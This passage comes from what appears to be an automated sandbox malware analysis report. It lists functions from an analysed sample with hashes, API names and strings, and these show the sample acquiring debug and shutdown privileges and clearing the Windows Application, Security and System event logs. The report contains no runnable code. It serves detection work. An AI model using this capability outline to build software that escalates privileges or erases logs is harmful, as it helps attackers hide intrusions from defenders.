                          • Instruction Fuzzy Hash: 75416132244BC285F720DF61E850BDAB3B7F784788F445029DA8D5BA69DF79CA16CB00
                          Function 000001CFB9608BE0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 60libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$HandleOpenToken$AddressAdjustCloseCurrentLookupModulePrivilegePrivilegesProcValue
                          • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                          • API String ID: 2787840106-1577477132
                          • Opcode ID: 27b4c8692a87e919420244d98f3be3ef49d2ab1f2781601b1f2affe4be556f26
                          • Instruction ID: 0a8f3b50de396d9765ddacc791febf0842fd41b2b3856bcf46fef9119d1e6d9e
                          • Opcode Fuzzy Hash: 27b4c8692a87e919420244d98f3be3ef49d2ab1f2781601b1f2affe4be556f26
                          • Instruction Fuzzy Hash: 31216071654AC682FB40EB21F458BD973B3FB99744F80002A9A4E47755DF78CA4B8B00
                          Function 000001CFB960B300 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 169timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$CountCriticalInitializeSectionSpinTimetime
                          • String ID: <$<
                          • API String ID: 4111701721-213342407
                          • Opcode ID: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction ID: 912438ddd8367c3b481ddf4994c130d7876424b5307478c9bfb8f56420ecd756
                          • Opcode Fuzzy Hash: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction Fuzzy Hash: 49816D32251B9186F7449F30E894B9D36BAF344F48F18513DEE494B798CF748A56CB50
                          Function 000001CFB96146F0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 159fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File_set_error_mode$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $ceil
                          • API String ID: 1085760375-2708072404
                          • Opcode ID: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction ID: f1efd2d9309b10e7e4835f313a778bd9a83b380af7f37859011f568ec837e163
                          • Opcode Fuzzy Hash: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction Fuzzy Hash: B251BE313806E282FA68DB36E415FDA63B3F785B84F54613E9E5943A95CF38CB078600
                          Function 000001CFB9615C80 Relevance: 17.2, APIs: 11, Instructions: 726COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointerwrite_multi_char$_errno$_getptd_invalid_parameter_noinfofreewrite_char
                          • String ID:
                          • API String ID: 1806013980-0
                          • Opcode ID: cfc0f20769d45f78b3fd9de320ef9a0baf2bf6926d7d34b006f1c7714b58f06a
                          • Instruction ID: aaac21aae9df307be8a44876ae1270996e3d8fa7f0ddd1a3fb18d3afe32271c9
                          • Opcode Fuzzy Hash: cfc0f20769d45f78b3fd9de320ef9a0baf2bf6926d7d34b006f1c7714b58f06a
                          • Instruction Fuzzy Hash: 9052C27A6446E286FB248B25D440BEE67B3F791784F24603EDE46876D4DB79CE42CB00
                          Function 000001CFB95C258D Relevance: 15.4, APIs: 10, Instructions: 379COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1457502553-0
                          • Opcode ID: 325b46088a9de835a7d5ce3a38d31851d4261e84cad792f7feb37616cf96ba1e
                          • Instruction ID: ca350aab8f257ee2ee3733288ef95e6374d19de80ac53219afdcd57369fe0cf4
                          • Opcode Fuzzy Hash: 325b46088a9de835a7d5ce3a38d31851d4261e84cad792f7feb37616cf96ba1e
                          • Instruction Fuzzy Hash: 5CB19432690A8D4BFB5C9F28C9597E536F2EB64305F44817EE806CA6D6EB34D9428740
                          Function 000001CFB9612ABC Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1457502553-0
                          • Opcode ID: 900f45e8ab1f3731fdba1d80f80e9cceab6a9df4fb6fddf17bfcd64c6472c285
                          • Instruction ID: ef8499addd71a7e526066376592efc2fa09df07da845fd8e564def6ae47bf337
                          • Opcode Fuzzy Hash: 900f45e8ab1f3731fdba1d80f80e9cceab6a9df4fb6fddf17bfcd64c6472c285
                          • Instruction Fuzzy Hash: AD910CB2B4039647FF689F35D851BD923B7D754784F04A039DE098BB9AEB38DA428700
                          Function 000001CFB9609240 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          • API String ID: 3435690185-3733053543
                          • Opcode ID: f6864e8bd37743c0b1b6ab4b1e596388afa61dc228198d856986d243d625baef
                          • Instruction ID: 3d129ef4ed57e1f34cabf9bb4d17bc4f13281e229df35c1b242386b4e737ce1b
                          • Opcode Fuzzy Hash: f6864e8bd37743c0b1b6ab4b1e596388afa61dc228198d856986d243d625baef
                          • Instruction Fuzzy Hash: 46118672664A8182F7509F24F445BDA73B3F798B84F40502AE98E86664DF3CCA46C700
                          Function 000001CFB961FC80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                          • String ID: gfffffff
                          • API String ID: 1282097019-1523873471
                          • Opcode ID: 0c226803b8e2fa94e5db95bc4459b450c41900e638d353238c39c50bb43af646
                          • Instruction ID: 7c0c08d79f61da6733e612557edd829d32f9793d7f0e19f4ace0a6e4f7c4c3e5
                          • Opcode Fuzzy Hash: 0c226803b8e2fa94e5db95bc4459b450c41900e638d353238c39c50bb43af646
                          • Instruction Fuzzy Hash: 53B12E73B443D68AFB518B29C541BE96BB7E712794F24A629CB19077D6E738CE12C300
                          Function 000001CFB96149D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID: ceil
                          • API String ID: 1239891234-3069211559
                          • Opcode ID: 80bbb357809a8fba14131b5a2509afaeb9666d446d8172d91e1175eae03acc4f
                          • Instruction ID: 1bfc13af19ffc8c93d52e2194ee23575ac81a730eb50cca95d20e99445ece6ae
                          • Opcode Fuzzy Hash: 80bbb357809a8fba14131b5a2509afaeb9666d446d8172d91e1175eae03acc4f
                          • Instruction Fuzzy Hash: 98318532244BD286EB60DF25E840BDE73B6F784754F51112AEA9D47B99DF38CA46CB00
                          Function 000001CFB96118A0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                          • String ID:
                          • API String ID: 3778485334-0
                          • Opcode ID: e5707091450cdb4362a9329fd622a1997c41ddec68d8beddf2dec9729cf8e822
                          • Instruction ID: fd4e1c7949cd368df733336c370458bd5af69639622125821961f2f9c3853120
                          • Opcode Fuzzy Hash: e5707091450cdb4362a9329fd622a1997c41ddec68d8beddf2dec9729cf8e822
                          • Instruction Fuzzy Hash: 9A310235188BC68AFB549B29F844B9A73B3F784754F50503EDA8E42B75DF78CA4A8700
                          Function 000001CFB95C83B1 Relevance: 10.9, APIs: 7, Instructions: 423COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_get_daylight_invalid_parameter_noinfo$free$___lc_codepage_func__wtomb_environ_getptd_lock
                          • String ID:
                          • API String ID: 4268574505-0
                          • Opcode ID: 0b6b600d6584b717979f169697568e8801cbfa89e78e1795e67fb67ce3776999
                          • Instruction ID: 66cd1c23da3f460cf45eec1ce55264379d776cfcde75bac55b125402eb219420
                          • Opcode Fuzzy Hash: 0b6b600d6584b717979f169697568e8801cbfa89e78e1795e67fb67ce3776999
                          • Instruction Fuzzy Hash: 28D1B4322D87855AF768DF28D952BEA77F2FB85700F44453D958AC3A92DB30DD038682
                          Function 00007FF6F6084118 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 241f8705c54542b00ba23ae9e4747f8ac05fcf6eae24842815941e357315b2f7
                          • Instruction ID: ef1ddf99c731a5d98c6dc04dd8cb6f52ff0e540989d959de8f615c21493807c4
                          • Opcode Fuzzy Hash: 241f8705c54542b00ba23ae9e4747f8ac05fcf6eae24842815941e357315b2f7
                          • Instruction Fuzzy Hash: 80313B76608B818AEB60CF60E8503E97364FB94748F54403ADA5D87BA4EF39D548CB04
                          Function 000001CFB960D17A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ClearCloseOpen
                          • String ID: Application$Security$System
                          • API String ID: 1391105993-2169399579
                          • Opcode ID: b127406249773358e5e11b63761867ee48fb052da9e69e9733cc3fafd9c54b4d
                          • Instruction ID: 1b99d139e0b406d410c7f5605c38e253758623a65b8f447828ac818d1d8ea51e
                          • Opcode Fuzzy Hash: b127406249773358e5e11b63761867ee48fb052da9e69e9733cc3fafd9c54b4d
                          • Instruction Fuzzy Hash: 77F06936242B8185FA11AB11F840BD973B6FB487A4F04813ACD8E42758DF38CA96D300
                          Function 000001CFB9608D60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 2349140579-2896544425
                          • Opcode ID: 321b2cae7bff57a9e89963d77093478fc382e47aaf95b36457d5e0c1824b015c
                          • Instruction ID: cd7d37a75f520ec89a8326c567916f0b2367ed131393b71fedc978334b15b896
                          • Opcode Fuzzy Hash: 321b2cae7bff57a9e89963d77093478fc382e47aaf95b36457d5e0c1824b015c
                          • Instruction Fuzzy Hash: 20112E76644B8182FB509F61F4457CAB3B2F789748F84502AEA8A46659DF7DC50ACB00
                          Function 000001CFB9603BD0 Relevance: 7.8, APIs: 5, Instructions: 251memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$Timetime
                          • String ID:
                          • API String ID: 3637049079-0
                          • Opcode ID: 4fa5d4eb8249f7fc5b01871b3ec7c486aed6e35c9c3c858bf8975f25bc673ae4
                          • Instruction ID: f5df11d716ae7dcb9ade83c8cd42fb1dd5b650850d5dbd24fb5725785dd68b40
                          • Opcode Fuzzy Hash: 4fa5d4eb8249f7fc5b01871b3ec7c486aed6e35c9c3c858bf8975f25bc673ae4
                          • Instruction Fuzzy Hash: FDA19D7234068697EB589F29C1C0FA977B3F744B85F40852EDA0A87794DF34DAA2C744
                          Function 000001CFB9605950 Relevance: 7.8, APIs: 5, Instructions: 250memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree$Timetime
                          • String ID:
                          • API String ID: 3637049079-0
                          • Opcode ID: 3f7189f942930bc74d5e75278d5825dc4c3d285d932db17dfbb9ca7332083d22
                          • Instruction ID: 480f7a039366519aaed11bf22db695fdd0189de9f125ebbae91a286717f6cbe9
                          • Opcode Fuzzy Hash: 3f7189f942930bc74d5e75278d5825dc4c3d285d932db17dfbb9ca7332083d22
                          • Instruction Fuzzy Hash: 69A19E3235068687EB589B2AC1D4BAD77B7F744B84F04852EDA0A87784DF34DE92C780
                          Function 000001CFB9621DB0 Relevance: 5.8, Strings: 4, Instructions: 795COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 0-2761157908
                          • Opcode ID: 8bd9a9bf164ea3d087f418727a36b5ef1a2b669ae8676b0d11799860c2ff5d1e
                          • Instruction ID: 333361272bc56a8551c70c0d7dbb6a6e998a79019e5fa6ca2a8c06f000ba2576
                          • Opcode Fuzzy Hash: 8bd9a9bf164ea3d087f418727a36b5ef1a2b669ae8676b0d11799860c2ff5d1e
                          • Instruction Fuzzy Hash: 4D62BC77B642928AF729AFA5C010FED37B3B754748F419129DE0567A88EB38CE16C740
                          Function 000001CFB95C8E1D Relevance: 4.8, APIs: 3, Instructions: 302COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: a26687288d06543ccd96ee82c763caa90d38d7c723e7feccb07240ac6b5fbf04
                          • Instruction ID: f843386d27404f349c4acb2afa058b99226d5a45a2b5361e2131e44310d92d99
                          • Opcode Fuzzy Hash: a26687288d06543ccd96ee82c763caa90d38d7c723e7feccb07240ac6b5fbf04
                          • Instruction Fuzzy Hash: 6581293279484A0BE70C9E2CCD667F436E7E7E8315F18917EE546CBBE6E624D9438200
                          Function 000001CFB961934C Relevance: 4.7, APIs: 3, Instructions: 207COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2819658684-0
                          • Opcode ID: c3817968f48e8c550ddf513603500fb7d5119fb71e6552507bce0a96c1220ba0
                          • Instruction ID: 7989841b41b48479a78d1c58f7014b1f6ee72b725a551d3551b216b5f2a864e9
                          • Opcode Fuzzy Hash: c3817968f48e8c550ddf513603500fb7d5119fb71e6552507bce0a96c1220ba0
                          • Instruction Fuzzy Hash: 81611CB2B1168647EB1C8B19EC11BA85277A3D4744F48D13EEA098F7D5E73CEB028740
                          Function 000001CFB95BD7F1 Relevance: 4.2, Strings: 3, Instructions: 440COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: malloc
                          • String ID: $gfff$gfff
                          • API String ID: 2803490479-4202476792
                          • Opcode ID: 7cc1be224e196b4f6ed1a53e46d7184ece0a7e8b7b30a585aeec09b27ae818fa
                          • Instruction ID: 6fb695d7e431bc6859f5cd4fb10ac0727c75fe06be5566b265984550322a4845
                          • Opcode Fuzzy Hash: 7cc1be224e196b4f6ed1a53e46d7184ece0a7e8b7b30a585aeec09b27ae818fa
                          • Instruction Fuzzy Hash: 24E1A370A58A488FEB59EF68D4497A977F2FF59301F10823EE40AD7291EB34D9428781
                          Function 000001CFB962154C Relevance: 3.6, APIs: 2, Instructions: 613COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2959964966-0
                          • Opcode ID: 328f41f7dfe114806a6c44e27ca05faa19419f9d68533c46d440295ddf3d0012
                          • Instruction ID: d10922f5a4ddef119654b215d10a720b718174782068c11b4ad9c0038ce6382b
                          • Opcode Fuzzy Hash: 328f41f7dfe114806a6c44e27ca05faa19419f9d68533c46d440295ddf3d0012
                          • Instruction Fuzzy Hash: A1328B76B882C68AF764AF65D090BEC37B7A350748F56802ECE4667AC5D739CE478700
                          Function 000001CFB95C8831 Relevance: 3.3, APIs: 2, Instructions: 311COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight
                          • String ID:
                          • API String ID: 4143689357-0
                          • Opcode ID: 382fc29538bcfa4a5651e63f289fab288ad892ffe1de4efe1d8fd15b971a8192
                          • Instruction ID: fcbf14843cc1a38121f0904e549e824074345803d8b565655f156d3e248433e3
                          • Opcode Fuzzy Hash: 382fc29538bcfa4a5651e63f289fab288ad892ffe1de4efe1d8fd15b971a8192
                          • Instruction Fuzzy Hash: 0BA134727946414BE71C8B18CD827F573F7E399304F14913EDA86CBA96EB30EA038681
                          Function 000001CFB95C41C1 Relevance: 3.2, APIs: 2, Instructions: 240COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1239817535-0
                          • Opcode ID: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction ID: ddfd5831888e5406394feb5293d4cdd3918f86ce7e4f448116565e9f9c6bf67d
                          • Opcode Fuzzy Hash: d3cf21d439a7a2adc3bf91effe72efd9b1260cb70a201c5d72699df0ac142f71
                          • Instruction Fuzzy Hash: 8461A9322989484BFB5CEF28E955BEA72F6E794300F00453EE44BC29D6DF24DE478646
                          Function 000001CFB939A30C Relevance: 3.2, APIs: 2, Instructions: 240COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 1239817535-0
                          • Opcode ID: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
                          • Instruction ID: e3bce266b9bf17945730c6ae6b2607eb783aaa15c511d7da643e005285d73f52
                          • Opcode Fuzzy Hash: 44de1f721c027da7a128cc94a5ad70c9ea0fd816ea6c17f66893cfbd735dff7b
                          • Instruction Fuzzy Hash: E1619C312589884BF758EB24D8567AA73EAEF94300F19463EE45BC21D2DF34DE078645
                          Function 000001CFB9618D60 Relevance: 3.2, APIs: 2, Instructions: 235COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
